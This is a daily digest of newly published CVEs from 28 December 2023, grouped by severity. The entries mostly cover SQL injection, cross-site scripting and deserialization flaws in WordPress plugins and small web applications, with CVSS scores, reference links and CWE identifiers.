Latest vulnerabilities [Thursday, December 28, 2023]


Last update performed on 12/28/2023 at 11:57:05 PM

(2) CRITICAL VULNERABILITIES [9.0, 10.0]

Source : tenable.com

Vulnerability ID : CVE-2023-7163

First published on : 28-12-2023 16:16:02
Last modified on : 28-12-2023 19:05:29

Description :
A security issue exists in D-Link D-View 8 v2.0.2.89 and prior that could allow an attacker to manipulate the probe inventory of the D-View service. This could result in the disclosure of information from other probes, denial of service conditions due to the probe inventory becoming full, or the execution of tasks on other probes.

CVE ID : CVE-2023-7163
Source : vulnreport@tenable.com
CVSS Score : 10.0

References :
https://tenable.com/security/research/tra-2023-43 | source : vulnreport@tenable.com

Vulnerability : CWE-20


Source : patchstack.com

Vulnerability ID : CVE-2023-50839

First published on : 28-12-2023 20:16:07
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin. This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.8.1.

CVE ID : CVE-2023-50839
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/js-support-ticket/wordpress-js-help-desk-plugin-2-8-1-unauthenticated-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


(23) HIGH VULNERABILITIES [7.0, 8.9]

Source : github.com

Vulnerability ID : CVE-2023-52082

First published on : 28-12-2023 16:16:02
Last modified on : 28-12-2023 19:05:29

Description :
Lychee is a free photo-management tool. Prior to 5.0.2, Lychee is vulnerable to an SQL injection on any binding when using mysql/mariadb. This injection is only active for users with the `.env` settings set to DB_LOG_SQL=true and DB_LOG_SQL_EXPLAIN=true. The default settings of Lychee are safe. The patch is provided in version 5.0.2. To work around this issue, disable SQL EXPLAIN logging.

CVE ID : CVE-2023-52082
Source : security-advisories@github.com
CVSS Score : 8.8

References :
https://github.com/LycheeOrg/Lychee/commit/33354a2ce7cf700cc4ee537b7b8b94dfc1e84ad4 | source : security-advisories@github.com
https://github.com/LycheeOrg/Lychee/security/advisories/GHSA-rjwv-5j3m-p5x4 | source : security-advisories@github.com

Vulnerability : CWE-89


Source : patchstack.com

Vulnerability ID : CVE-2023-50840

First published on : 28-12-2023 19:15:14
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in wpdevelop, oplugins Booking Manager. This issue affects Booking Manager: from n/a through 2.1.5.

CVE ID : CVE-2023-50840
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/booking-manager/wordpress-booking-manager-plugin-2-1-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50841

First published on : 28-12-2023 19:15:14
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Repute Infosystems BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin. This issue affects BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin: from n/a through 1.0.72.

CVE ID : CVE-2023-50841
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/bookingpress-appointment-booking/wordpress-bookingpress-plugin-1-0-72-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50842

First published on : 28-12-2023 19:15:14
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Matthew Fries MF Gig Calendar. This issue affects MF Gig Calendar: from n/a through 1.2.1.

CVE ID : CVE-2023-50842
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/mf-gig-calendar/wordpress-mf-gig-calendar-plugin-1-2-1-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-32795

First published on : 28-12-2023 11:15:08
Last modified on : 28-12-2023 15:09:45

Description :
Deserialization of Untrusted Data vulnerability in WooCommerce Product Add-Ons. This issue affects Product Add-Ons: from n/a through 6.1.3.

CVE ID : CVE-2023-32795
Source : audit@patchstack.com
CVSS Score : 8.2

References :
https://patchstack.com/database/vulnerability/woocommerce-product-addons/wordpress-woocommerce-product-add-ons-plugin-6-1-3-authenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-50856

First published on : 28-12-2023 11:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FunnelKit Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits. This issue affects Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits: from n/a through 2.14.3.

CVE ID : CVE-2023-50856
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/funnel-builder/wordpress-funnel-builder-for-wordpress-by-funnelkit-plugin-2-14-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50857

First published on : 28-12-2023 11:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FunnelKit Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit. This issue affects Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit: from n/a through 2.6.1.

CVE ID : CVE-2023-50857
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/wp-marketing-automations/wordpress-automation-by-funnelkit-plugin-2-6-1-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50848

First published on : 28-12-2023 12:15:42
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aaron J 404 Solution. This issue affects 404 Solution: from n/a through 2.34.0.

CVE ID : CVE-2023-50848
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/404-solution/wordpress-404-solution-plugin-2-34-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50849

First published on : 28-12-2023 12:15:42
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in E2Pdf.Com E2Pdf – Export To Pdf Tool for WordPress. This issue affects E2Pdf – Export To Pdf Tool for WordPress: from n/a through 1.20.23.

CVE ID : CVE-2023-50849
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/e2pdf/wordpress-e2pdf-plugin-1-20-23-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50851

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in N Squared Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin. This issue affects Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin: from n/a before 1.6.6.1.

CVE ID : CVE-2023-50851
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/simply-schedule-appointments/wordpress-simply-schedule-appointments-booking-plugin-1-6-6-1-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50852

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in StylemixThemes Booking Calendar | Appointment Booking | BookIt. This issue affects Booking Calendar | Appointment Booking | BookIt: from n/a through 2.4.3.

CVE ID : CVE-2023-50852
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/bookit/wordpress-bookit-plugin-2-4-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50853

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nasirahmed Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms. This issue affects Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms: from n/a through 1.75.0.

CVE ID : CVE-2023-50853
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/advanced-form-integration/wordpress-advanced-form-integration-plugin-1-75-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50854

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Squirrly Squirrly SEO - Advanced Pack. This issue affects Squirrly SEO - Advanced Pack: from n/a through 2.3.8.

CVE ID : CVE-2023-50854
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/squirrly-seo-pack/wordpress-squirrly-seo-advanced-pack-plugin-2-3-8-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50855

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sam Perrow Pre* Party Resource Hints. This issue affects Pre* Party Resource Hints: from n/a through 1.8.18.

CVE ID : CVE-2023-50855
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/pre-party-browser-hints/wordpress-pre-party-resource-hints-plugin-1-8-18-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50843

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Clockwork Clockwork SMS Notifications. This issue affects Clockwork SMS Notifications: from n/a through 3.0.4.

CVE ID : CVE-2023-50843
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/mediaburst-email-to-sms/wordpress-clockwork-sms-notfications-plugin-3-0-4-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50844

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in James Ward Mail logging – WP Mail Catcher. This issue affects Mail logging – WP Mail Catcher: from n/a through 2.1.3.

CVE ID : CVE-2023-50844
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/wp-mail-catcher/wordpress-wp-mail-catcher-plugin-2-1-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50845

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AyeCode - WordPress Business Directory Plugins GeoDirectory – WordPress Business Directory Plugin, or Classified Directory. This issue affects GeoDirectory – WordPress Business Directory Plugin, or Classified Directory: from n/a through 2.3.28.

CVE ID : CVE-2023-50845
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/geodirectory/wordpress-geodirectory-plugin-2-3-28-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50846

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RegistrationMagic RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login. This issue affects RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login: from n/a through 5.2.4.5.

CVE ID : CVE-2023-50846
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-4-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50847

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Collne Inc. Welcart e-Commerce. This issue affects Welcart e-Commerce: from n/a through 2.9.3.

CVE ID : CVE-2023-50847
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-9-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50838

First published on : 28-12-2023 20:16:07
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Basix NEX-Forms – Ultimate Form Builder – Contact forms and much more. This issue affects NEX-Forms – Ultimate Form Builder – Contact forms and much more: from n/a through 8.5.5.

CVE ID : CVE-2023-50838
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/nex-forms-express-wp-form-builder/wordpress-nex-forms-ultimate-form-builder-8-5-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-32513

First published on : 28-12-2023 11:15:08
Last modified on : 28-12-2023 15:09:45

Description :
Deserialization of Untrusted Data vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform. This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.3.

CVE ID : CVE-2023-32513
Source : audit@patchstack.com
CVSS Score : 7.5

References :
https://patchstack.com/database/vulnerability/give/wordpress-give-donation-plugin-plugin-2-25-3-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-51501

First published on : 28-12-2023 10:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Undsgn Uncode - Creative & WooCommerce WordPress Theme allows Reflected XSS. This issue affects Uncode - Creative & WooCommerce WordPress Theme: from n/a through 2.8.6.

CVE ID : CVE-2023-51501
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/uncode-core/wordpress-uncode-core-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Source : usom.gov.tr

Vulnerability ID : CVE-2023-4671

First published on : 28-12-2023 10:15:08
Last modified on : 28-12-2023 15:09:53

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Talent Software ECOP allows Command Line Execution through SQL Injection. This issue affects ECOP: before 32255.

CVE ID : CVE-2023-4671
Source : iletisim@usom.gov.tr
CVSS Score : 7.5

References :
https://www.usom.gov.tr/bildirim/tr-23-0737 | source : iletisim@usom.gov.tr

Vulnerability : CWE-89


(26) MEDIUM VULNERABILITIES [4.0, 6.9]

Source : github.com

Vulnerability ID : CVE-2023-52079

First published on : 28-12-2023 16:16:01
Last modified on : 28-12-2023 19:05:29

Description :
msgpackr is a fast MessagePack NodeJS/JavaScript implementation. Prior to 1.10.1, when decoding user-supplied MessagePack messages, users can trigger stuck threads by crafting messages that keep the decoder stuck in a loop. The fix is available in v1.10.1. Exploits seem to require structured cloning; replacing the 0x70 extension with your own (one that throws an error or does something other than recursive referencing) should mitigate the issue.

CVE ID : CVE-2023-52079
Source : security-advisories@github.com
CVSS Score : 6.8

References :
https://github.com/kriszyp/msgpackr/commit/18f44f8800e2261341cdf489d1ba1e35a0133602 | source : security-advisories@github.com
https://github.com/kriszyp/msgpackr/security/advisories/GHSA-7hpj-7hhx-2fgx | source : security-advisories@github.com

Vulnerability : CWE-674
Vulnerability : CWE-754


Vulnerability ID : CVE-2023-52081

First published on : 28-12-2023 16:16:02
Last modified on : 28-12-2023 19:05:29

Description :
ffcss is a CLI interface to apply and configure Firefox CSS themes. Prior to 0.2.0, the function `lookupPreprocess()` is meant to apply some transformations to a string by disabling characters in the regex `[-_ .]`. However, due to the use of late Unicode normalization of type NFKD, it is possible to bypass that validation and re-introduce all the characters in the regex `[-_ .]`. The `lookupPreprocess()` can be easily bypassed with equivalent Unicode characters like U+FE4D (﹍), which would result in the omitted U+005F (_), for instance. The `lookupPreprocess()` function is only ever used to search for themes loosely (case insensitively, while ignoring dashes, underscores and dots), so the actual security impact is classified as low. This vulnerability is fixed in 0.2.0. There are no known workarounds.

CVE ID : CVE-2023-52081
Source : security-advisories@github.com
CVSS Score : 5.3

References :
https://github.com/ewen-lbh/ffcss/commit/f9c491874b858a32fcae15045f169fd7d02f90dc | source : security-advisories@github.com
https://github.com/ewen-lbh/ffcss/security/advisories/GHSA-wpmx-564x-h2mh | source : security-advisories@github.com

Vulnerability : CWE-176
Vulnerability : CWE-74


Vulnerability ID : CVE-2023-50267

First published on : 28-12-2023 16:16:01
Last modified on : 28-12-2023 19:05:29

Description :
MeterSphere is a one-stop open source continuous testing platform. Prior to 2.10.10-lts, an authenticated attacker can update resources that do not belong to them if the resource ID is known. This issue is fixed in 2.10.10-lts. There are no known workarounds.

CVE ID : CVE-2023-50267
Source : security-advisories@github.com
CVSS Score : 4.3

References :
https://github.com/metersphere/metersphere/security/advisories/GHSA-rcp4-c5p2-58v9 | source : security-advisories@github.com

Vulnerability : CWE-269
Vulnerability : CWE-639


Source : patchstack.com

Vulnerability ID : CVE-2023-36381

First published on : 28-12-2023 11:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Deserialization of Untrusted Data vulnerability in Gesundheit Bewegt GmbH Zippy. This issue affects Zippy: from n/a through 1.6.5.

CVE ID : CVE-2023-36381
Source : audit@patchstack.com
CVSS Score : 6.6

References :
https://patchstack.com/database/vulnerability/zippy/wordpress-zippy-plugin-1-6-3-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-50874

First published on : 28-12-2023 10:15:08
Last modified on : 28-12-2023 15:09:53

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Darren Cooney WordPress Infinite Scroll – Ajax Load More allows Stored XSS. This issue affects WordPress Infinite Scroll – Ajax Load More: from n/a through 6.1.0.1.

CVE ID : CVE-2023-50874
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/ajax-load-more/wordpress-ajax-load-more-plugin-6-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-50859

First published on : 28-12-2023 11:15:10
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum WP Crowdfunding allows Stored XSS. This issue affects WP Crowdfunding: from n/a through 2.1.6.

CVE ID : CVE-2023-50859
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/wp-crowdfunding/wordpress-wp-crowdfunding-plugin-2-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-50860

First published on : 28-12-2023 11:15:10
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TMS Booking for Appointments and Events Calendar – Amelia allows Stored XSS. This issue affects Booking for Appointments and Events Calendar – Amelia: from n/a through 1.0.85.

CVE ID : CVE-2023-50860
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/ameliabooking/wordpress-amelia-plugin-1-0-85-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-50836

First published on : 28-12-2023 11:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ibericode HTML Forms allows Stored XSS. This issue affects HTML Forms: from n/a through 1.3.28.

CVE ID : CVE-2023-50836
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/html-forms/wordpress-html-forms-plugin-1-3-28-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-50858

First published on : 28-12-2023 11:15:10
Last modified on : 28-12-2023 15:09:45

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Bill Minozzi Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan. This issue affects Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan: from n/a through 4.34.

CVE ID : CVE-2023-50858
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/antihacker/wordpress-anti-hacker-plugin-4-34-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-27447

First published on : 28-12-2023 11:15:07
Last modified on : 28-12-2023 15:09:45

Description :
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in VeronaLabs WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc. This issue affects WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n/a through 6.0.4.

CVE ID : CVE-2023-27447
Source : audit@patchstack.com
CVSS Score : 5.3

References :
https://patchstack.com/database/vulnerability/wp-sms/wordpress-wp-sms-plugin-6-0-4-sensitive-data-exposure-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2022-36399

First published on : 28-12-2023 22:15:45
Last modified on : 28-12-2023 22:15:45

Description :
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BoxyStudio Booked - Appointment Booking for WordPress | Calendars. This issue affects Booked - Appointment Booking for WordPress | Calendars: from n/a before 2.4.4.

CVE ID : CVE-2022-36399
Source : audit@patchstack.com
CVSS Score : 5.3

References :
https://patchstack.com/database/vulnerability/booked/wordpress-booked-plugin-2-4-unauth-appointment-data-exposure-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2023-50873

First published on : 28-12-2023 11:15:10
Last modified on : 28-12-2023 15:09:45

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Add Any Extension to Pages. This issue affects Add Any Extension to Pages: from n/a through 1.4.

CVE ID : CVE-2023-50873
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/add-any-extension-to-pages/wordpress-add-any-extension-to-pages-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Source : vuldb.com

Vulnerability ID : CVE-2023-7123

First published on : 28-12-2023 00:15:12
Last modified on : 28-12-2023 15:09:53

Description :
A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracking System 1.0. This issue affects some unknown processing of the file /classes/Master.php?f=save_medicine. The manipulation of the argument id/name/description leads to SQL injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249095.

CVE ID : CVE-2023-7123
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://medium.com/@2839549219ljk/medicine-tracking-system-sql-injection-7b0dde3a82a4 | source : cna@vuldb.com
https://vuldb.com/?ctiid.249095 | source : cna@vuldb.com
https://vuldb.com/?id.249095 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7126

First published on : 28-12-2023 14:15:44
Last modified on : 28-12-2023 15:09:45

Description :
A vulnerability classified as critical has been found in code-projects Automated Voting System 1.0. This affects an unknown part of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to SQL injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249129 was assigned to this vulnerability.

CVE ID : CVE-2023-7126
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Automated_Voting_System/Automated_Voting_System-SQL_Injection-1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249129 | source : cna@vuldb.com
https://vuldb.com/?id.249129 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7127

First published on : 28-12-2023 15:15:07
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability classified as critical was found in code-projects Automated Voting System 1.0. This vulnerability affects unknown code of the component Login. The manipulation of the argument idno leads to SQL injection. The exploit has been disclosed to the public and may be used. VDB-249130 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-7127
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Automated_Voting_System/Automated_Voting_System-SQL_Injection-2.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249130 | source : cna@vuldb.com
https://vuldb.com/?id.249130 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7128

First published on : 28-12-2023 15:15:07
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability, which was classified as critical, has been found in code-projects Voting System 1.0. This issue affects some unknown processing of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to SQL injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249131.

CVE ID : CVE-2023-7128
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Voting_System/Voting_System-SQL_Injection-1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249131 | source : cna@vuldb.com
https://vuldb.com/?id.249131 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7131

First published on : 28-12-2023 17:15:09
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability was found in code-projects Intern Membership Management System 2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /user_registration/ of the component User Registration. The manipulation of the argument userName leads to SQL injection. The exploit has been disclosed to the public and may be used. VDB-249134 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-7131
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Intern_Membership_Management_System/Intern_Membership_Management_System-SQL-Injection.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249134 | source : cna@vuldb.com
https://vuldb.com/?id.249134 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7134

First published on : 28-12-2023 20:16:07
Last modified on : 28-12-2023 20:21:23

Description :
A vulnerability was found in SourceCodester Medicine Tracking System 1.0. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument page leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249137 was assigned to this vulnerability.

CVE ID : CVE-2023-7134
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://medium.com/@2839549219ljk/medicine-tracking-system-rce-vulnerability-1f009165b915 | source : cna@vuldb.com
https://vuldb.com/?ctiid.249137 | source : cna@vuldb.com
https://vuldb.com/?id.249137 | source : cna@vuldb.com

Vulnerability : CWE-24


Vulnerability ID : CVE-2023-7137

First published on : 28-12-2023 22:15:45
Last modified on : 28-12-2023 22:15:45

Description :
A vulnerability, which was classified as critical, has been found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the component HTTP POST Request Handler. The manipulation of the argument uemail leads to SQL injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249140.

CVE ID : CVE-2023-7137
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Client_Details_System/Client_Details_System-SQL_Injection_1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249140 | source : cna@vuldb.com
https://vuldb.com/?id.249140 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7138

First published on : 28-12-2023 22:15:45
Last modified on : 28-12-2023 22:15:45

Description :
A vulnerability, which was classified as critical, was found in code-projects Client Details System 1.0. This affects an unknown part of the file /admin of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249141 was assigned to this vulnerability.

CVE ID : CVE-2023-7138
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Client_Details_System/Client_Details_System-SQL_Injection_2.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249141 | source : cna@vuldb.com
https://vuldb.com/?id.249141 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7129

First published on : 28-12-2023 16:16:02
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability, which was classified as critical, was found in code-projects Voting System 1.0. Affected is an unknown function of the component Voters Login. The manipulation of the argument voter leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249132.

CVE ID : CVE-2023-7129
Source : cna@vuldb.com
CVSS Score : 5.5

References :
